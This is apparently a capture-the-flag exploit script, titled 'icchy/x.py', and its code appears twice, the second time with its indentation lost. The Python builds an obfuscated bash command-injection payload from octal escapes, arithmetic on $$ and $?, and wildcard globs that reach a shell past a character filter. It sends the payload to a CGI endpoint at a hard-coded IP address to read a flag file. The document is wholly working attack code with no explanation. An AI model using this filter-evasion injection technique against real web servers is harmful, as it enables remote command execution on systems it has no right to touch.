icchy/x.py

## x.py
from urllib.request import urlopen
from urllib import request
import string


def escape(val):
    return '''
$'\\\\{}'
'''[1:-1].format(val)

used = []

def gen_lit(c):
    if c not in used:
        if c not in 'usrbinflagUSRBINFLAG1234567890vwxyz cpth':
            if c in string.ascii_letters:
                used.append(c)
            return c

    s = oct(ord(c))[2:]

    ret = ""
    for n in s:
        n = int(n)
        if n == 0:
            ret += '$?'
            continue
        if n == 1:
            ret += '$((_**_))'
            continue
        ret += '$((({})/$$))'.format('+'.join(['$$' for i in range(n)]))
    return "\\\\{}".format(ret)


def gen_payload(payload):
    return '''
/???/[^c-~]?[p-t]h<<<"$'{}'|od"
'''[1:-1].format(''.join([gen_lit(v) for v in payload]))


payload = gen_payload('flag')
print(payload)
print(len(payload))

res = urlopen('http://153.120.168.36/cgi-bin/index.cgi?_=_[$({})]'.format(payload))
print(res.read().decode())
	from urllib.request import urlopen
	from urllib import request
	import string


	def escape(val):
	return '''
	$'\\\\{}'
	'''[1:-1].format(val)

	used = []

	def gen_lit(c):
	if c not in used:
	if c not in 'usrbinflagUSRBINFLAG1234567890vwxyz cpth':
	if c in string.ascii_letters:
	used.append(c)
	return c

	s = oct(ord(c))[2:]

	ret = ""
	for n in s:
	n = int(n)
	if n == 0:
	ret += '$?'
	continue
	if n == 1:
	ret += '$((_**_))'
	continue
	ret += '$((({})/$$))'.format('+'.join(['$$' for i in range(n)]))
	return "\\\\{}".format(ret)


	def gen_payload(payload):
	return '''
	/???/[^c-~]?[p-t]h<<<"$'{}'\|od"
	'''[1:-1].format(''.join([gen_lit(v) for v in payload]))


	payload = gen_payload('flag')
	print(payload)
	print(len(payload))

	res = urlopen('http://153.120.168.36/cgi-bin/index.cgi?_=_[$({})]'.format(payload))
	print(res.read().decode())